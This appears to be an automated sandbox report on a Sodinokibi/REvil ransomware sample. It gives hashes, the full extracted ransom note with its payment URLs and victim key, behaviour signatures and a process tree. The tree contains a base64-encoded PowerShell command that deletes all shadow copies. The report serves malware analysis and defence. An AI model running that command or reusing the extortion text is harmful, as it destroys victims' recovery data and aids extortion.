Analysis

  • max time kernel
    71s
  • max time network
    74s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    20-08-2020 13:04

General

  • Target

    d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll

  • Size

    116KB

  • MD5

    946a25739c934f91f795e002a9f77bda

  • SHA1

    48fa5f0d87d162f8ae67e01d7ee309ae8fa976cf

  • SHA256

    d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8

  • SHA512

    07e6ec47cfbb44975ff7e69973c8154d8f26af1acb26e62b40e0003943953ab87b15a222b14bae7bfb74849f9aff36d727372cff3c3954418db7d28e9119ae69

Malware Config

Extracted

Path

C:\sg9x6os19h-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension sg9x6os19h. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4798B3F2F1587432 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/4798B3F2F1587432 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: F3swsH7uQeaVStinh5d33JYjqagCoxrdtRd1FpWy1KyPBLuefEqc2ZR4hlvHrYGK 4AvtFQzCPnLKUYqi7x4B3cgGbReww0a1WRwHmwc7yegY5fg1oJWiOrk49PLOSGtU i0tJlUlzXs++5pPVIZaN2SzdTgK0Ew6ZCEwGwCuF0Zb2z3UojnRQOId6wsJIk9KY Oj4JvVF3nGoHOKz8rVItYRj+btmKn8aBA1Gx7kBlVZSyK8ISVckJ4Ghpbsx83yui MZkXolBOk8X7jQsSwFmSzn12xeRv0ExIsVpqB7F0XlijOScx08Nn/XPrPD3FWnbD puewhOsBgfBW69XiDWpaT2xtVpYGzjteU89w8RxsOclb4j8cBjtaY4iEGTLlZOc3 UQo0hTfVz9Ddc7RyMQS2b9wEF/RDNeyXRxDh2zwPRT7Uz4kUdjnIB7svnM8WXnQR V0xCtco3Bn2vG12KGHrANMP779dVGxpH7flxXX5fMl+s4QMYDj88FKez+Jo+xndW DFcd/I/y6p+wDDsbVhDL6qfjVSPXMB9aIvgCS40MM/svg76sWkKL5oLiDLY+pIKu R5IUsFk8AWSnf4hRXbuzQ7bZhyjz35irZxNzbbfq5aEtQicxMKHYzrMFOGTlY43F Ak4rbbKPyyOdnLbhPDF6LoVc6a9uY7iu28AW19rDcbTH7o9/nS920EJkl1a83pFp JdA4t+KhwLf8BxhDvIMdlT9d3ZrItbABvSXMkcq7xkcHAl79jadj27HpgGB+fVbY OPEAb/OA5Ifeza1Cp6P/OD1OzH1sRF3ViOeEBT0A+DgU0ggm814pYm7dGGkcQ7oQ JJdiYA3a1+b092IDRtpm6lbpmWz2pcwhDnyE3jYNp04CVbDGTsqtCoYY2xIngzzd R8dET4rTMur0nQQNGMtgG3oWsjHH53Iha+cyRNUgs5/VgTguglSc6yfL1TXJiXMS NolHu+lM+SOXiDJeStk+LKs7F3V9C1pHj6Hayx6zu3JkYrKzpjDnZsqEANFCrKh+ h2JiSWq2ZjiMv9Tz2/PsMksPB9Ka4wA3Pl1P4dMNSHHZRpW3IgzlijDdAPzsG8jh +mIY2QeBXhIApR2dzzlKF8WCI9ew1y/7X75L/DF2s6VSck6c4aTFITKUwofEx9KD K/qw8Yv2yGlAQ9Gl7vb//xybRWrnhKdTNJDx2yc1HKxzpdrg6cSPsZvZ/ZG1FEHA EpVh/6YMlNxfkt6HDQ5+knTayxLJSKDWJLQ2UwsutgWfcHLWNhupox1ndk2B6L1/ E8JzJLxlNY+9FK5PtSaTzw7o02vSuMSE ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4798B3F2F1587432

http://decryptor.cc/4798B3F2F1587432

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll,#1
      2⤵
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:640
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:392
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Modifies service
      • Suspicious use of AdjustPrivilegeToken
      PID:2188

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/640-1-0x0000000000000000-mapping.dmp

    • memory/640-2-0x00007FFFE4DE0000-0x00007FFFE57CC000-memory.dmp

      Filesize

      9.9MB

    • memory/640-3-0x000001DAEE340000-0x000001DAEE341000-memory.dmp

      Filesize

      4KB

    • memory/640-4-0x000001DAEE4F0000-0x000001DAEE4F1000-memory.dmp

      Filesize

      4KB

    • memory/2972-0-0x0000000000000000-mapping.dmp